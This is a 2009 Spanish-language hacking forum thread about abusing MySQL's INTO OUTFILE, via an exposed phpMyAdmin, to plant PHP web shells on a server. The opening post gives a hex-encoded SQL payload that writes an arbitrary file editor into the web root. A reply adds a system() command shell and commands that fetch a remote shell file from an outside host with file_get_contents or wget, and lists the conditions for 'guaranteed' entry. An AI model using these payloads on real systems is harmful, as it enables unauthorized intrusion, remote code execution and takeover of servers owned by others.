Un buen uso de INTO OUTFILE

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

Un buen uso de INTO OUTFILE

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Un buen uso de INTO OUTFILE (Leído 5,991 veces)

HardieVon

Desconectado

Mensajes: 181

Programming HardCore

Un buen uso de INTO OUTFILE

« en: 6 Marzo 2009, 02:17 am »

Hola que tal encontre un servidor con phpmyadmin y entre tantas pruebas de codigo como.
<? system(...
<? eval(....
me decidi en fabricar una pequeña herramientilla.

utilizando la instruccion OUTFILE...

Código

SELECT 0x64 /* Hexadecimal */ INTO OUTFILE "C:/servidor/editor.php"; /* Path del servidor */

y con el codigo php.

Código

<?php $f=$_GET['f'];$s=$_POST['s'];if($s!=''){if($r=fopen($f,'w+')){fwrite($r,stripslashes($s));echo 'OK<br>';}fclose($r);}$r=fopen($f,'r');$c=fread($r,filesize($f));fclose($r);echo "<form method=POST ><textarea name=s >$c</textarea><br><input type=submit value=guardar ></form>";?>

ahora concluimos con este codigo y podremos editar archivos en el servidor...

Código

SELECT
0x3C3F7068702024663D245F4745545B2766275D3B24733D245F504F53545B2773275D3B6966282473213D2727297B69662824723D666F70656E2824662C27772B2729297B6677726974652824722C7374726970736C617368657328247329293B6563686F20274F4B3C62723E273B7D66636C6F7365282472293B7D24723D666F70656E2824662C277227293B24633D66726561642824722C66696C6573697A6528246629293B66636C6F7365282472293B6563686F20223C666F726D206D6574686F643D504F5354203E3C7465787461726561206E616D653D73203E24633C2F74657874617265613E3C62723E3C696E70757420747970653D7375626D69742076616C75653D67756172646172203E3C2F666F726D3E223B3F3E 
INTO OUTFILE "C:/servidor/editor.php";

el nombre del fichero se pasa por una variable GET llamada "f".
de la forma editor.php?f=index.php

Saludos de perro


	En línea

No es google, Es el google perfecto
USALO !!!, apoyemos el software hispano
AHORA CON BUSCADOR A PHP.NET

OzX

Desconectado

Mensajes: 406

[NuKe] Team

Re: Un buen uso de INTO OUTFILE

« Respuesta #1 en: 6 Marzo 2009, 02:48 am »

hi brota¡
Into Outfile. siempre sirve. cuando tienes magic quotes off, privilegios en el usuario , y el document root, y una carpeta con permisos.

Con esas 4 cosas, tienes Ya Seguro el Ingreso a un Servidor.

Y en este Post:
http://foro.undersecurity.net/read.php?15,772

E Posteado varias Formas de Obtener Privilegios Mediante esta tecnica.

Por ej En el Source a Insertar. Ingresar.

Código:

<? file_put_contents('shell.php',file_get_contents('http://www.ruta.com/shell.txt'));?>

Tambien Se Puede pasar a Hexa SQL para no tener dramas con las " "

En el Caso que no Tenga file_get_conetents, habilitado se puede hacer lo siguiente

Código:

<? system($_REQUEST['cmd']); ?>

y Luego con Wget

Código:

wget -c --output-document=shell.php www.script.com/shell.txt

Asi Kedaria

Código:

http://www.pagina.com/file/c.php?cmd=wget -c --output-document=shell.php www.script.com/shell.txt

Y Vuala ¡

Saludos¡


	En línea

Undersecurity.net

HardieVon

Desconectado

Mensajes: 181

Programming HardCore

Re: Un buen uso de INTO OUTFILE

« Respuesta #2 en: 6 Marzo 2009, 05:00 am »

Si lo que pasa es que con esa tecnica.. existen archivos que superan el tiempo de ejecucion... por que el file_get, supera en algunos casos...colosales tamaños como la c99 y tambien existen algunos server sin consola...

Saludos de perro


« Última modificación: 6 Marzo 2009, 05:04 am por HansVon »	En línea

No es google, Es el google perfecto
USALO !!!, apoyemos el software hispano
AHORA CON BUSCADOR A PHP.NET

OzX

Desconectado

Mensajes: 406

[NuKe] Team

Re: Un buen uso de INTO OUTFILE

« Respuesta #3 en: 8 Marzo 2009, 20:15 pm »

Citar

tambien existen algunos server sin consola

Como?


	En línea

Undersecurity.net

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Por qué no me funciona instruccion into outfile ? Bases de Datos	luison	3	7,279	24 Diciembre 2010, 17:06 pm por Shell Root
	Se puede hacer un INTO OUTFILE en una iSQL BLIND? Nivel Web	Shell Root	2	2,629	18 Marzo 2013, 21:07 pm por WHK